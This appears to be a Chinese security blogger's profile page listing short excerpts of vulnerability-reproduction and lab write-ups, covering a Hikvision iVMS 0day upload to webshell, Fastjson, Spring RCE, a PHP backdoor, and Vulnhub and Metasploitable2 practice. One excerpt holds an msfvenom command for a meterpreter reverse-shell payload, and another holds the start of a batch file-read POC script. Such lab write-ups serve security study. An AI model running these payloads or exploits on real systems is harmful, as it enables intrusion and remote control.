自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

原创 海康威视iVMS系统在野 0day漏洞复现

简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。

2023-05-26 11:09:12 2157 3

原创 记一次heapdump泄露到拿下云主机

记一次heapdump泄露到拿下云主机

2022-12-08 15:06:52 2657 3

原创 Proxifier之小程序抓包

Proxifier之全局代理抓微信小程序数据包

2022-11-15 13:58:27 5840

原创 常见文件头标志

PE(exe,dll)文件头:4D5AJPEG (jpg),文件头:FFD8FFPNG (png),文件头:89504E47GIF (gif),文件头:47494638TIFF (tif),文件头:49492A00Windows Bitmap (bmp),文件头:424DCAD (dwg),文件头:41433130Adobe Photoshop (psd),文件头:38425053Rich Text Format (rtf),文件头:7B5C727466XML (xml),文件头:3C3F

2022-10-11 11:38:40 1390

原创 Fastjson反序列化漏洞复现

Fastjson反序列化漏洞复现

2022-09-29 09:40:17 1264

原创 spring-core-rce-2022-03-29 漏洞复现

spring-core-rce 漏洞复现

2022-09-20 21:08:31 532

原创 齐博CMSV7任意文件读取漏洞批量测试POC

注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。# -*- coding:utf-8 -*-import requestsimport reimport urllibimport base64def dakai(filename): with open(filename,'r',encoding='utf-8') as fp: # url_list = [] # for i in fp.readlines():

2022-04-22 15:20:20 1384 1

原创 vulhub 8.1-backdoor漏洞复现

漏洞描述PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。漏洞危害攻击者可以通过user-agent来执行恶意代码获取重要信息。漏洞等级高危 ★★★★影响范围PHP 8.1.0-dev加固方法建议参考官方公告及时升级或安装相应补丁。参考链接:https://news-web.php.net/php.internals/113838https://github.co

2022-02-28 16:40:09 3910

原创 Vulnhub之Breach1.0靶场练习

靶机信息下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip环境配置1.解压后用vmware打开,这里是我已经安装好的,未安装的只有ova和readme.txt两个文件Pasted image 20220221090234.png2.靶机默认使用仅主机模式,ip为192.168.110.140,所以需要将vmnet1的ip设置在192.168.110.0此网段。Pasted image 20220221090526.pngPasted

2022-02-22 09:15:41 3840

原创 ZVulDrill安装及通关教程

一、安装1、首先下载一下该安装包下载链接:https://github.com/710leo/ZVulDrill2、下载一个phpstudy下载链接:https://www.xp.cn/download.html根据自己得个人下载一个适合得版本,默认是下载到d盘注:phpstudy为一个集成得环境非常得方便,包含了apache、mysql等环境,包括pikachu等都可以用phpstudy来搭建3、将下载好的压缩包解压至phpstudy下面得www目录下面4、修改文件密码修改一下sys目录

2021-10-27 16:32:37 4452 4

原创 Metasploitable2靶机学习

Metasploitable2靶机渗透什么是Metasploitable2?Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。使用步骤下载地址:https://sourceforge.net/projects/metasploitable/files/latest/download默认用户名密码都为:msfadmin下载下来后直接双击网卡模式我默认为NAT模式(NAT模式与自己wifi同网段,使用kali时也要在同一网

2021-10-13 11:52:20 4077

原创 记kali下使用metasploit木马进行远程控制

环境:ubuntun+kali2020.4本次实验需要两台虚拟机kali及ubuntun注:kali地址为192.168.147.137 ubuntun的地址为192.168.147.129本人使用ssh链接ssh链接ubuntun 并进入root权限ssh链接kali在kali下root权限下生成payload(也就是木马)msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137 LPORT=4444 -

2021-05-11 11:18:33 1071

原创 解决centos7搭建docker环境下../upload文件夹不存在,请手工创建!问题

当发现docker环境搭建的upload出现该问题后的处置方法1、首先进入到docker中,如果不知道自己的docker在哪里可以用docker ps查看所有在运行的容器信息,找到其ID使用docker inspect + id 查看docker位置发现到var/lib下面 进入到docker环境中使用docker exec -it $(docker ps -q) /bin/bash进入到www目录下,使用ls命令可以看到没有upload文件夹使用mkdir upload命令创建文件夹然

2021-05-03 18:22:57 1075 4

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除